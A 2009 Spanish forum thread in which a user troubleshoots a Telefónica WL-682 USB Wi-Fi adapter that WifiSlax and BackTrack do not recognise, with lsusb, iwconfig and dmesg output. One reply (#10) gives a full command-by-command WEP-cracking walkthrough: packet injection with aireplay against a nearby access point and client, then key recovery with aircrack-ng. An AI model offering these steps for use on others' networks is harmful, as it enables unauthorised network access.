Autor Tema: Adapt USB Telefónica WL-682 - no lo reconoce WSlax2 ni 3.1  (Leído 5313 veces)

0 Usuarios y 2 Visitantes están viendo este tema.

fje

  • Visitante
Adapt USB Telefónica WL-682 - no lo reconoce WSlax2 ni 3.1
« en: 01-07-2009, 17:34 (Miércoles) »
Hola, estoy tratando de emplear ese adaptador para auditoria con las distro de WifiSlax, peor no me lo reconoce.

Para dar datos, se trata del adaptador USB de color azul acero con un antena que puede subirse o bajarse al lado derecho que daba Telefónica hace un tiempo. Es de un amigo que ya no lo usa y yo pensaba emplearlo para estos menesteres, que tengo un portátil Centrino con la Intel 2200BG y que ese adaptador de Telefónica el Windows lo identifica como SparkLAN WL-682 y le instala un driver de Prism02.

Problema: lo he intentado usar con WifiSlax 2.0, 3.0 y 3.1 y no hay manera, "no lo ve". he hecho lo siguiente:

Arranco WifiSlax con el adaptador ya conectado en el puerto USB, y:

En el caso de WifiSlax 2.0:

Si ejecuto ifconfig me da:
l0 y sus datos de configuración

Si ejecuto iwconfig me da:
l0 y sus datos de configuración
eth0 unassociated etc. etc.
rtap0 no wireless extensions
***supongo que esos dos eth0 y rtap0 son los del Intel 2200BG***
eth1 no wireles extensions
sit0 no wireless extensions

He intentado forzar el driver prism, pero nada, dice lo mismo.

Si ejecuto lsusb me da para ese dispositivo:
15a9 0002

-----------------------------

En el caso de WifiSLAX 3.1:

Si ejecuto ifconfig me da:
l0 y sus datos de configuración

Si ejecuto iwconfig me da:
l0 y sus datos de configuración
eth0 no wireless extensions
***supongo que en este caso no reconce al Intel 2200BG***
irda0 no wireles extension

Si ejecuto lsusb me da para ese dispositivo:
15a9 0002


Y en ninguno de los casos consigo que el Linux "vea" el adaptador wifi como tal.

Tampoco tengo ni idea de qué es lo que reconoce como "sit0" en el caso de la distro 2.0 ni el "irda0" en la 3.1 (aunque en este caso hasta podría ser los infrarrojos.

he intentado también con Bactrack 3, pero ocurre lo mismo.

¿Alguna idea de cómo o qué hacer para poder emplearla con estas distros?

Gracias !!!!



uNbAs

  • Visitante
Re: Adapt USB Telefónica WL-682 - no lo reconoce WSlax2 ni 3.1
« Respuesta #1 en: 02-07-2009, 16:55 (Jueves) »
Pirms 02 no existe sera 2.0 y en ese caso si es soportado .... haz un dmesg a ver que te dice la consola ....

fje

  • Visitante
Re: Adapt USB Telefónica WL-682 - no lo reconoce WSlax2 ni 3.1
« Respuesta #2 en: 02-07-2009, 17:57 (Jueves) »
uNBaS, gracias por responder.

Veamos, ya me imagino lo de 2.0, cuando yo ponía PRISM02 es poque es el ficheor de driver que instala el Windows para ese dispositivo. Si no recuerdo mal puede "elegir" entre PRISM02 y PRISMGT y elige el 02. No sé si eso ayuda.

En cuanto a la salida del dmesg, es muy larga, la he pasado a un fichero de texto, que no es muy grande, sólo 16K, pero no sé exactamente que debo "buscar" en ella, como puedes ver, no soy muy "experto" en Linux. ¿Cómo puedo hacertelo llegar?

fje

  • Visitante
Re: Adapt USB Telefónica WL-682 - no lo reconoce WSlax2 ni 3.1
« Respuesta #3 en: 03-07-2009, 17:51 (Viernes) »
Siguiendo sugerencia de uNbAs pongo aquí la salida del dmesg por si alguien puede darme una pista de lo que está ocurriendo y así puede servir también de ayuda si otros están en situación parecida. Es largo, ero espero sirva:

***********************************************
wifislax ~ # dmesg
M v1.316
I2O ProcFS OSM v1.316
Fusion MPT base driver 3.04.04
Copyright (c) 1999-2007 LSI Logic Corporation
Fusion MPT SPI Host driver 3.04.04
Fusion MPT FC Host driver 3.04.04
Fusion MPT SAS Host driver 3.04.04
usbmon: debugfs is not available
usbcore: registered new interface driver hiddev
usbcore: registered new interface driver usbhid
drivers/usb/input/hid-core.c: v2.6:USB HID core driver
usbcore: registered new interface driver gtco
GTCO usb driver version: 2.00.0006<6>usbcore: registered new interface driver berr
y_charge
usbcore: registered new interface driver iowarrior
PNP: PS/2 Controller [PNP0303:KBD,PNP0f13:MOU] at 0x60,0x64 irq 1,12
serio: i8042 KBD port at 0x60,0x64 irq 1
serio: i8042 AUX port at 0x60,0x64 irq 12
mice: PS/2 mouse device common for all mice
md: linear personality registered for level -1
md: raid0 personality registered for level 0
md: raid1 personality registered for level 1
md: raid10 personality registered for level 10
raid6: int32x1    719 MB/s
raid6: int32x2    914 MB/s
raid6: int32x4    617 MB/s
raid6: int32x8    577 MB/s
raid6: mmxx1     2207 MB/s
raid6: mmxx2     2552 MB/s
raid6: sse1x1    1527 MB/s
raid6: sse1x2    2666 MB/s
raid6: sse2x1    2930 MB/s
raid6: sse2x2    3203 MB/s
raid6: using algorithm sse2x2 (3203 MB/s)
md: raid6 personality registered for level 6
md: raid5 personality registered for level 5
md: raid4 personality registered for level 4
raid5: automatically using best checksumming function: pIII_sse
   pIII_sse  :  5326.000 MB/sec
raid5: using function: pIII_sse (5326.000 MB/sec)
md: multipath personality registered for level -4
md: faulty personality registered for level -5
device-mapper: ioctl: 4.11.0-ioctl (2006-10-12) initialised: dm-devel@redhat.com
device-mapper: multipath: version 1.0.5 loaded
device-mapper: multipath round-robin: version 1.0.0 loaded
device-mapper: multipath emc: version 0.0.3 loaded
TCP cubic registered
Initializing XFRM netlink socket
NET: Registered protocol family 1
NET: Registered protocol family 17
Using IPI Shortcut mode
input: AT Translated Set 2 keyboard as /class/input/input4
md: Autodetecting RAID arrays.
md: autorun ...
md: ... autorun DONE.
RAMDISK: Compressed image found at block 0
EXT2-fs warning: checktime reached, running e2fsck is recommended
VFS: Mounted root (ext2 filesystem).
Freeing unused kernel memory: 312k freed
squashfs: version 3.2-r2 (2007/01/15) Phillip Lougher
squashfs: LZMA suppport for slax.org by jro
aufs 20070625
fuse init (API version 7.8)
ACPI: PCI Interrupt Link [LNKH] enabled at IRQ 11
ACPI: PCI Interrupt 0000:00:1d.7[D] -> Link [LNKH] -> GSI 11 (level, low) -> IRQ 1
1
PCI: Setting latency timer of device 0000:00:1d.7 to 64
ehci_hcd 0000:00:1d.7: EHCI Host Controller
ehci_hcd 0000:00:1d.7: new USB bus registered, assigned bus number 1
ehci_hcd 0000:00:1d.7: debug port 1
PCI: cache line size of 32 is not supported by device 0000:00:1d.7
ehci_hcd 0000:00:1d.7: irq 11, io mem 0xc0000000
ehci_hcd 0000:00:1d.7: USB 2.0 started, EHCI 1.00, driver 10 Dec 2004
usb usb1: configuration #1 chosen from 1 choice
hub 1-0:1.0: USB hub found
hub 1-0:1.0: 6 ports detected
USB Universal Host Controller Interface driver v3.0
ACPI: PCI Interrupt 0000:00:1d.0[A] -> Link [LNKA] -> GSI 11 (level, low) -> IRQ 1
1
PCI: Setting latency timer of device 0000:00:1d.0 to 64
uhci_hcd 0000:00:1d.0: UHCI Host Controller
uhci_hcd 0000:00:1d.0: new USB bus registered, assigned bus number 2
uhci_hcd 0000:00:1d.0: irq 11, io base 0x00001800
usb usb2: configuration #1 chosen from 1 choice
hub 2-0:1.0: USB hub found
hub 2-0:1.0: 2 ports detected
ACPI: PCI Interrupt Link [LNKD] enabled at IRQ 11
ACPI: PCI Interrupt 0000:00:1d.1 -> Link [LNKD] -> GSI 11 (level, low) -> IRQ 1
1
PCI: Setting latency timer of device 0000:00:1d.1 to 64
uhci_hcd 0000:00:1d.1: UHCI Host Controller
uhci_hcd 0000:00:1d.1: new USB bus registered, assigned bus number 3
uhci_hcd 0000:00:1d.1: irq 11, io base 0x00001820
usb usb3: configuration #1 chosen from 1 choice
hub 3-0:1.0: USB hub found
hub 3-0:1.0: 2 ports detected
ACPI: PCI Interrupt 0000:00:1d.2[C] -> Link [LNKC] -> GSI 11 (level, low) -> IRQ 1
1
PCI: Setting latency timer of device 0000:00:1d.2 to 64
uhci_hcd 0000:00:1d.2: UHCI Host Controller
uhci_hcd 0000:00:1d.2: new USB bus registered, assigned bus number 4
uhci_hcd 0000:00:1d.2: irq 11, io base 0x00001840
usb usb4: configuration #1 chosen from 1 choice
hub 4-0:1.0: USB hub found
hub 4-0:1.0: 2 ports detected
usb 1-3: new high speed USB device using ehci_hcd and address 2
Initializing USB Mass Storage driver...
usb 1-3: configuration #1 chosen from 1 choice
usb 1-4: new high speed USB device using ehci_hcd and address 3
usb 1-4: configuration #1 chosen from 1 choice
usb 4-2: new full speed USB device using uhci_hcd and address 2
usb 4-2: configuration #1 chosen from 1 choice
scsi2 : SCSI emulation for USB Mass Storage devices
usbcore: registered new interface driver usb-storage
USB Mass Storage support registered.
usb-storage: device found at 2
usb-storage: waiting for device to settle before scanning
Yenta: CardBus bridge found at 0000:02:00.0 [1014:0552]
Yenta: Using INTVAL to route CSC interrupts to PCI
Yenta: Routing CardBus interrupts to PCI
Yenta TI: socket 0000:02:00.0, mfunc 0x01d21b22, devctl 0x64
Yenta: ISA IRQ mask 0x04b8, PCI irq 11
Socket status: 30000086
pcmcia: parent PCI bridge I/O window: 0x4000 - 0x8fff
cs: IO port probe 0x4000-0x8fff: clean.
pcmcia: parent PCI bridge Memory window: 0xc0200000 - 0xcfffffff
pcmcia: parent PCI bridge Memory window: 0xe8000000 - 0xefffffff
Yenta: CardBus bridge found at 0000:02:00.1 [1014:0552]
Yenta: Using INTVAL to route CSC interrupts to PCI
Yenta: Routing CardBus interrupts to PCI
Yenta TI: socket 0000:02:00.1, mfunc 0x01d21b22, devctl 0x64
Yenta: ISA IRQ mask 0x04b8, PCI irq 11
Socket status: 30000086
pcmcia: parent PCI bridge I/O window: 0x4000 - 0x8fff
cs: IO port probe 0x4000-0x8fff: clean.
pcmcia: parent PCI bridge Memory window: 0xc0200000 - 0xcfffffff
pcmcia: parent PCI bridge Memory window: 0xe8000000 - 0xefffffff
ISO 9660 Extensions: Microsoft Joliet Level 3
ISO 9660 Extensions: RRIP_1991A
ISO 9660 Extensions: Microsoft Joliet Level 3
ISO 9660 Extensions: RRIP_1991A
scsi 2:0:0:0: Direct-Access     Kingston DataTraveler 2.0 1.00 PQ: 0 ANSI: 2
SCSI device sda: 15646656 512-byte hdwr sectors (8011 MB)
sda: Write Protect is off
sda: Mode Sense: 65 44 09 30
sda: assuming drive cache: write through
SCSI device sda: 15646656 512-byte hdwr sectors (8011 MB)
sda: Write Protect is off
sda: Mode Sense: 65 44 09 30
sda: assuming drive cache: write through
 sda: sda1
sd 2:0:0:0: Attached scsi removable disk sda
usb-storage: device scan complete
usbcore: deregistering interface driver usb-storage
uhci_hcd 0000:00:1d.2: remove, state 1
usb usb4: USB disconnect, address 1
usb 4-2: USB disconnect, address 2
uhci_hcd 0000:00:1d.2: USB bus 4 deregistered
ACPI: PCI interrupt for device 0000:00:1d.2 disabled
uhci_hcd 0000:00:1d.1: remove, state 1
usb usb3: USB disconnect, address 1
uhci_hcd 0000:00:1d.1: USB bus 3 deregistered
ACPI: PCI interrupt for device 0000:00:1d.1 disabled
uhci_hcd 0000:00:1d.0: remove, state 1
usb usb2: USB disconnect, address 1
uhci_hcd 0000:00:1d.0: USB bus 2 deregistered
ACPI: PCI interrupt for device 0000:00:1d.0 disabled
ehci_hcd 0000:00:1d.7: remove, state 1
usb usb1: USB disconnect, address 1
usb 1-3: USB disconnect, address 2
usb 1-4: USB disconnect, address 3
ehci_hcd 0000:00:1d.7: USB bus 1 deregistered
ACPI: PCI interrupt for device 0000:00:1d.7 disabled
fuse exit
input: PC Speaker as /class/input/input5
input: PS/2 Synaptics TouchPad as /class/input/input6
parport: PnPBIOS parport detected.
parport0: PC-style at 0x3bc, irq 7 [PCSPP,TRISTATE]
lp0: using parport0 (interrupt-driven).
lp0: console ready
Linux agpgart interface v0.102 (c) Dave Jones
fuse init (API version 7.8)
Capability LSM initialized
Databook TCIC-2 PCMCIA probe: not found.
Yenta: CardBus bridge found at 0000:02:00.0 [1014:0552]
Yenta: Using INTVAL to route CSC interrupts to PCI
Yenta: Routing CardBus interrupts to PCI
Yenta TI: socket 0000:02:00.0, mfunc 0x01d21b22, devctl 0x64
Yenta: ISA IRQ mask 0x0438, PCI irq 11
Socket status: 30000086
pcmcia: parent PCI bridge I/O window: 0x4000 - 0x8fff
cs: IO port probe 0x4000-0x8fff: clean.
pcmcia: parent PCI bridge Memory window: 0xc0200000 - 0xcfffffff
pcmcia: parent PCI bridge Memory window: 0xe8000000 - 0xefffffff
Yenta: CardBus bridge found at 0000:02:00.1 [1014:0552]
Yenta: Using INTVAL to route CSC interrupts to PCI
Yenta: Routing CardBus interrupts to PCI
Yenta TI: socket 0000:02:00.1, mfunc 0x01d21b22, devctl 0x64
Yenta: ISA IRQ mask 0x0438, PCI irq 11
Socket status: 30000086
pcmcia: parent PCI bridge I/O window: 0x4000 - 0x8fff
cs: IO port probe 0x4000-0x8fff: clean.
pcmcia: parent PCI bridge Memory window: 0xc0200000 - 0xcfffffff
pcmcia: parent PCI bridge Memory window: 0xe8000000 - 0xefffffff
pcmcia: Detected deprecated PCMCIA ioctl usage from process: cardmgr.
pcmcia: This interface will soon be removed from the kernel; please expect breakag
e unless you upgrade to new tools.
pcmcia: see http://www.kernel.org/pub/linux/utils/kernel/pcmcia/pcmcia.html for de
tails.
cs: IO port probe 0xc00-0xcff: clean.
cs: IO port probe 0xc00-0xcff: clean.
cs: IO port probe 0x820-0x8ff: clean.
cs: IO port probe 0x820-0x8ff: clean.
cs: IO port probe 0x800-0x80f: clean.
cs: IO port probe 0x800-0x80f: clean.
cs: IO port probe 0x3e0-0x4ff: excluding 0x4d0-0x4d7
cs: IO port probe 0x3e0-0x4ff: excluding 0x4d0-0x4d7
cs: IO port probe 0x100-0x3af: clean.
cs: IO port probe 0x100-0x3af: clean.
cs: IO port probe 0xa00-0xaff: clean.
cs: IO port probe 0xa00-0xaff: clean.
ieee80211_crypt: registered algorithm 'NULL'
ieee80211: 802.11 data/management/control stack, git-1.1.13
ieee80211: Copyright (C) 2004-2005 Intel Corporation <jketreno@linux.intel.com>
ipw2200: Intel(R) PRO/Wireless 2200/2915 Network Driver, 1.2.0kmprq
ipw2200: Copyright(c) 2003-2006 Intel Corporation
ACPI: PCI Interrupt 0000:02:02.0[A] -> Link [LNKC] -> GSI 11 (level, low) -> IRQ 1
1
ipw2200: Detected Intel PRO/Wireless 2200BG Network Connection
ipw2200: ipw2200-bss.fw request_firmware failed: Reason -2
ipw2200: Unable to load firmware: -2
ipw2200: failed to register network device
ACPI: PCI interrupt for device 0000:02:02.0 disabled
ipw2200: probe of 0000:02:02.0 failed with error -5
Intel(R) PRO/1000 Network Driver - version 7.3.20-k2-NAPI
Copyright (c) 1999-2006 Intel Corporation.
ACPI: PCI Interrupt 0000:02:01.0[A] -> Link [LNKA] -> GSI 11 (level, low) -> IRQ 1
1
e1000: 0000:02:01.0: e1000_probe: (PCI:33MHz:32-bit) 00:11:25:b0:f3:4f
e1000: eth0: e1000_probe: Intel(R) PRO/1000 Network Connection
ACPI: PCI Interrupt 0000:00:1f.5 -> Link [LNKB] -> GSI 11 (level, low) -> IRQ 1
1
PCI: Setting latency timer of device 0000:00:1f.5 to 64
intel8x0_measure_ac97_clock: measured 55475 usecs
intel8x0: clocking to 48000
ACPI: PCI Interrupt 0000:00:1f.3 -> Link [LNKB] -> GSI 11 (level, low) -> IRQ 1
1
i8xx TCO timer: initialized (0x1060). heartbeat=30 sec (nowayout=0)
iTCO_vendor_support: vendor-support=0
iTCO_wdt: Intel TCO WatchDog Timer Driver v1.01 (21-Jan-2007)
iTCO_wdt: I/O address 0x1060 already in use
iTCO_wdt: No card detected
shpchp: Standard Hot Plug PCI Controller Driver version: 0.4
ACPI: PCI Interrupt 0000:00:1d.7[D] -> Link [LNKH] -> GSI 11 (level, low) -> IRQ 1
1
PCI: Setting latency timer of device 0000:00:1d.7 to 64
ehci_hcd 0000:00:1d.7: EHCI Host Controller
ehci_hcd 0000:00:1d.7: new USB bus registered, assigned bus number 1
ehci_hcd 0000:00:1d.7: debug port 1
PCI: cache line size of 32 is not supported by device 0000:00:1d.7
ehci_hcd 0000:00:1d.7: irq 11, io mem 0xc0000000
ehci_hcd 0000:00:1d.7: USB 2.0 started, EHCI 1.00, driver 10 Dec 2004
usb usb1: configuration #1 chosen from 1 choice
hub 1-0:1.0: USB hub found
hub 1-0:1.0: 6 ports detected
USB Universal Host Controller Interface driver v3.0
ACPI: PCI Interrupt 0000:00:1d.0[A] -> Link [LNKA] -> GSI 11 (level, low) -> IRQ 1
1
PCI: Setting latency timer of device 0000:00:1d.0 to 64
uhci_hcd 0000:00:1d.0: UHCI Host Controller
uhci_hcd 0000:00:1d.0: new USB bus registered, assigned bus number 2
uhci_hcd 0000:00:1d.0: irq 11, io base 0x00001800
usb usb2: configuration #1 chosen from 1 choice
hub 2-0:1.0: USB hub found
hub 2-0:1.0: 2 ports detected
ACPI: PCI Interrupt 0000:00:1d.1 -> Link [LNKD] -> GSI 11 (level, low) -> IRQ 1
1
PCI: Setting latency timer of device 0000:00:1d.1 to 64
uhci_hcd 0000:00:1d.1: UHCI Host Controller
uhci_hcd 0000:00:1d.1: new USB bus registered, assigned bus number 3
uhci_hcd 0000:00:1d.1: irq 11, io base 0x00001820
usb usb3: configuration #1 chosen from 1 choice
hub 3-0:1.0: USB hub found
hub 3-0:1.0: 2 ports detected
ACPI: PCI Interrupt 0000:00:1d.2[C] -> Link [LNKC] -> GSI 11 (level, low) -> IRQ 1
1
PCI: Setting latency timer of device 0000:00:1d.2 to 64
uhci_hcd 0000:00:1d.2: UHCI Host Controller
uhci_hcd 0000:00:1d.2: new USB bus registered, assigned bus number 4
uhci_hcd 0000:00:1d.2: irq 11, io base 0x00001840
usb usb4: configuration #1 chosen from 1 choice
hub 4-0:1.0: USB hub found
hub 4-0:1.0: 2 ports detected
usb 1-3: new high speed USB device using ehci_hcd and address 2
agpgart: Detected an Intel 855PM Chipset.
agpgart: AGP aperture is 256M @ 0xd0000000
usb 1-3: configuration #1 chosen from 1 choice
usb 1-4: new high speed USB device using ehci_hcd and address 3
usb 1-4: configuration #1 chosen from 1 choice
usb 4-2: new full speed USB device using uhci_hcd and address 2
usb 4-2: configuration #1 chosen from 1 choice
rtc_cmos 00:06: rtc core: registered rtc_cmos as rtc0
rtc_cmos: probe of 00:06 failed with error -16
NET: Registered protocol family 23
pnp: Device 00:0c activated.
nsc-ircc, chip->init
nsc-ircc, Found chip at base=0x02e
nsc-ircc, driver loaded (Dag Brattli)
IrDA: Registered device irda0
nsc-ircc, Found dongle: HP HSDL-1100/HSDL-2100
ohci_hcd: 2006 August 04 USB 1.1 'Open' Host Controller (OHCI) Driver
Initializing USB Mass Storage driver...
scsi3 : SCSI emulation for USB Mass Storage devices
usbcore: registered new interface driver usb-storage
USB Mass Storage support registered.
usb-storage: device found at 2
usb-storage: waiting for device to settle before scanning
scsi 3:0:0:0: Direct-Access     Kingston DataTraveler 2.0 1.00 PQ: 0 ANSI: 2
SCSI device sda: 15646656 512-byte hdwr sectors (8011 MB)
sda: Write Protect is off
sda: Mode Sense: 65 44 09 30
sda: assuming drive cache: write through
SCSI device sda: 15646656 512-byte hdwr sectors (8011 MB)
sda: Write Protect is off
sda: Mode Sense: 65 44 09 30
sda: assuming drive cache: write through
 sda: sda1
sd 3:0:0:0: Attached scsi removable disk sda
usb-storage: device scan complete
NET: Registered protocol family 10
lo: Disabled Privacy Extensions
NTFS volume version 3.1.
NTFS volume version 3.1.
NTFS volume version 3.1.
NTFS volume version 3.1.
NTFS volume version 3.1.
Bluetooth: Core ver 2.11
NET: Registered protocol family 31
Bluetooth: HCI device and connection manager initialized
Bluetooth: HCI socket layer initialized
Bluetooth: L2CAP ver 2.8
Bluetooth: L2CAP socket layer initialized
Bluetooth: HIDP (Human Interface Emulation) ver 1.2
Bluetooth: RFCOMM socket layer initialized
Bluetooth: RFCOMM TTY layer initialized
Bluetooth: RFCOMM ver 1.8
mtrr: no more MTRRs available
mtrr: no more MTRRs available
mtrr: no more MTRRs available
******************************************

Gracias

uNbAs

  • Visitante
Re: Adapt USB Telefónica WL-682 - no lo reconoce WSlax2 ni 3.1
« Respuesta #4 en: 03-07-2009, 18:56 (Viernes) »
Pues no se si se me ha perdido algo .... pero no veo los drivers cargados .... Los que si veo cargados son los de:

Citar
ipw2200: Detected Intel PRO/Wireless 2200BG Network Connection
ipw2200: ipw2200-bss.fw request_firmware failed: Reason -2
ipw2200: Unable to load firmware: -2
ipw2200: failed to register network device

Que es una tarjeta MUY buena .... y en la 3.1 tambien es reconocida ....

Prueba con el comando lsub a ver que te suelta ... primero con la tarjeta insertada mientras inicia el sistema y despues pinchandola cuando el sistema es iniciado

fje

  • Visitante
Re: Adapt USB Telefónica WL-682 - no lo reconoce WSlax2 ni 3.1
« Respuesta #5 en: 03-07-2009, 23:41 (Viernes) »
Efectivamente, la IPW2200 va muy bien y me funciona de maravilla. Lo único es que está "unida-metida" en el portátil, que es un centrino y por eso lleva esa tarjeta, lo cual me limita un poco los sitios

Mi intención de usar la USB es por emplearla con otro portátil que NO es Centrino y porque además me da más flexibilidad de posicionarla alejada del portátil, en sitios "más adecuados" para mejor recepción.

Efectivamente, lo de que no aparecen sus drivers ya me lo temía y por lo poco que sé de Linux esa impresión me daba.

Normalmente la conecto antes de arrancar el Linux, y en esa situación, el lsusb me da:

15a9 0002

como decía más arriba. Luego intento insertarla una vez ya terminado el arranque del Linux y te digo si me da lo mismo.

Hecho, y da lo mismo: 15a9 0002

Si no recuerdo mal, y por lo que creo que vi en algún sitio, eso indica que es una tarjeta wifi PRISM....

Y si no carga los drivers y en teoría debería ser reconocida, ¿hay alguna forma de "forzar" a que la "vea"??

Gracias !
« Última modificación: 04-07-2009, 00:05 (Sábado) por fje »

fje

  • Visitante
Re: Adapt USB Telefónica WL-682 - no lo reconoce WSlax2 ni 3.1
« Respuesta #6 en: 13-07-2009, 16:01 (Lunes) »
¿Ninguna idea ni sugerencia para que este USB funcione?

portatilhwagm

  • Visitante
Re: Adapt USB Telefónica WL-682 - no lo reconoce WSlax2 ni 3.1
« Respuesta #7 en: 13-07-2009, 16:25 (Lunes) »
no sera la famosa usb que puede trabajar tanto en windows como en linux, ya se que te estamos mareando, pero mira de probar con la 1 live cd todas

  http://download.wifislax.com/wifislax-1.2-beta.iso

El md5 del fichero wifislax-1.2-beta.iso es 1e007110034ec486e6fcb6f81e37576d

 y mirate el famoso post de los problemas de las prism, ahora no lo recuero, pero se que en su dia hasta se pusieron lanzadores

la verdad me he tomado algumos meses de relax, y he olvidado muchas cosas de los drivers, y mas de los de prism, la 1.2 lleva kernel viejo y era ideal para las viejas, aunque habria que mirar en las secciones adecuadas a estas versiones para ver como tratabamos el temas de las prism, de sus lanzadores y de lso problemas que habia con los drivers de kernel y externos

no puedo decir mas al respecto, quiero actualizar un monton de paquetes para wifiway via wifipacket, y es ahora o nunca



portatilhwagm

  • Visitante
Re: Adapt USB Telefónica WL-682 - no lo reconoce WSlax2 ni 3.1
« Respuesta #10 en: 13-07-2009, 21:13 (Lunes) »
WIFIslax 2.0 (y posteriores) y pcmcia senao 2511 con prism2

Metemos la tarjeta senao 2511 en el pc y ya no la tocamos
y ejecutamos:

cardctl eject
cd /
cd /lib/modules/2.6.18-rc5
mcedit modules.dep
       - comentamos las cinco lineas que hacen referencia a wlan-ng
       - salvamos los cambios y salimos del editor
modprobe hostap_cs
cardctl insert
iwconfig
       - Observamos que nos aparece wlan0
airmon.sh start wlan0
ifconfig wlan0 up

Y ya la tenemos lista para trabajar.

Vamos a ver que redes tenemos alrededor

airodump-ng wlan0

elejimos un ap con un cliente o varios con encriptacion web y nos fijamos en:

nombre de essid:     en nuesttro caso linksys
canal emision:         13
mac del ap:             en nuestro caso 00:00:00:aa:aa:cb
mac del cliente:       en nuestro caso 00:bf:00:cc:00:ab

siguiente paso, ejecutar una asociacion flasa al AP ...........

iwconfig wlan0 essid essid del AP key key falsa channel canal del AP

quedando de la forma

iwconfig wlan0 essid linksys key 0123456789 channel 13

airodump-ng -c nº de canal del AP -b mac del AP -w nombre del fichero donde queremos que se guarden las inyeccciones wlan0

en nuestro ejemplo:

airodump-ng -c 11 -b 00:00:00:aa:aa:cb -w pedro wlan0

Abrimos otra consola ............

Y aqui es donde radica el problema de las PRISM2
NO HAY QUE UTILIZAR aireplay-ng     sino  aireplay

ejemplo:

aireplay -3 -x 1024 -b mac ap -h mac del cliente wlan0

quedando en nuestro caso:

aireplay -3 -x 1024 -b 00:00:00:aa:aa:cb -h 00:bf:00:cc:00:ab wlan0

cuando empiece a inyectar y lleguemos a 1.000.000 de paquetes o mas para una wep de 128
abrimos otra consola y ejecutamos:

ls -l

veremos el fichero que hemos creado con airodump-ng que en nuestro caso es pedro de la forma:

pedro-01.cap        con un tamaño muy considerable si hemos esperado a tener 1.000.000 de paquetes

ejecutamos en esta nueva consola:

airecrack-ng pedro-01.cap

Nos pedira que seleccionemos que essid queremos Auditar que en nuestro caso es linksys

y si tenemos suerte nos dara la clave wep
sino, habra que tener mas paquetes ..........

Espero que a alguien le sirva.

Un saludo

fje

  • Visitante
Re: Adapt USB Telefónica WL-682 - no lo reconoce WSlax2 ni 3.1
« Respuesta #11 en: 14-07-2009, 10:55 (Martes) »
Voy a ver si tengo el CD de la 1.2, porque ahora, en el sitio donde estoy, tengo más complicado hacer descargas "gordas" e imprimir "formas de hacer" las cosas, pero os aseguro que lo voy a inytentar (aunque sólo sea por agradecer vuestras sugerencias) y actualizaré este hilo con lo que salga.

Saludos y gracias de nuevo....

fje

  • Visitante
Re: Adapt USB Telefónica WL-682 - no lo reconoce WSlax2 ni 3.1
« Respuesta #12 en: 14-07-2009, 18:19 (Martes) »
Pues no tenía el CD de la 1.2, pero he conseguido bajarmelo de donde me decía HWAGM y ya he probado.

resultado: el mismo, no "ve" el adaptador wireless WL-682 por USB.

Luego me he dedicado a mirar las sugerencias que me dais, pero me da la impresión de que no son válidas para mi caso, pues todas pasan por un comando "cardctl", que si no me equivoco (no soy experto en Linux) es para tarjetas PCMCIA, y en mi caso estamos hablando de una USB, ¿es así o estoy "errado" (sin H)? ¿o hay alguna variación a lo que me decís que lo haga válido para las USBs?

Gracias otra vez.

P.D. Por cierto, no sé en auditoría, peor en recepción esta WL-682 por USB recibe más y mejor que la ipw2200 que tiene interna mi portátil, o sea que sería muy interesate poder usarla de alguna manera con el wifislax... ;)